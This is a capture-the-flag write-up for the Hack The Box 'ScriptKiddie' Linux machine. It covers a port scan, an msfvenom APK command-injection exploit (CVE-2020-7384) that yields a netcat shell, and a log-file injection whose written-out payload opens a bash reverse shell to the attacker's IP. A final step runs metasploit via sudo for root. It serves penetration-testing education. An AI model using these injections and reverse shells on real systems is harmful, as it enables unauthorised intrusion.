[*] INDEX:
[+] BOX INFO π» :
Operative System : Linux π§
Difficulty : Easy π
Owner : 0xdf
IP : 10.10.10.226
[+] PART 1 - GAIN ACCESS
The first step is scanning machine’s ports with nmap:
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
Once seen open ports, let’s get a deeper scan :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let’s check the website :
Hahaha “k1d'5 h4ck3r t00l5”, let’s try each tool :
nmap ->
This works fine…
payloads ->
With that we can create different types of payloads for our system, it’s using msfvenom
as we can see here :
Let’s search for a exploit for msfvenom
:
There is an interest exploit, we can inject commands with an apk template, and as we saw we have the option of apk
files :
But it didn’t work for me (or I just didn’t know how to do it), so let’s search for a exploit in github, in my case I found this one, running CVE-2020-7384.sh we can setup our maliciousapk file :
And now our apk file should be created :
Let’s upload this file to the victim server, but first of all we have to start listening from our local machine with netcat
:
From our local machine :
From the victim browser :
And as the end of CVE-2020-7384.sh said :
If you have access to the vulnerable machine then run:
msfvenom -x <your newly created apk> -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
Let’s set the LHOST to 127.0.0.1 and upload exploit.apk ->
Generate and let’s see our netcat :
And weβre in π! To get a full interactive shell we can run this :
script /dev/null -c bash
export SHELL=bash
export TERM=xterm-256color
stty rows 62 columns 235
[+] PART 2 - PRIVESC
[1] Escalating to Pwn
If we look inside pwn
user’s home directory we can see a file called scanlosers.sh :
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
This is actually vulnerable to command injection, we can inject commands to ${IP}, so we can turn a :
nmap –top-ports 10 -oN recon/10.10.10.10.nmap 10.10.10.10 2>&1 >/dev/null
into a :
And then we’ll get a reverse shell, as you can see we changed the whole meaning of the command. The script is reading $logs from /home/kid/logs/hackers
, so we can add there the command :
echo " ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.18/1234 0>&1’ #" » hackers
But first of all let’s listen from our local machine :
Nice we’re Pwn :sunglasses:!
[1] Escalating to root
If we run sudo -l
we can see this :
We can execute metasploit
as root, so let’s execute it with sudo and then spawn a bash :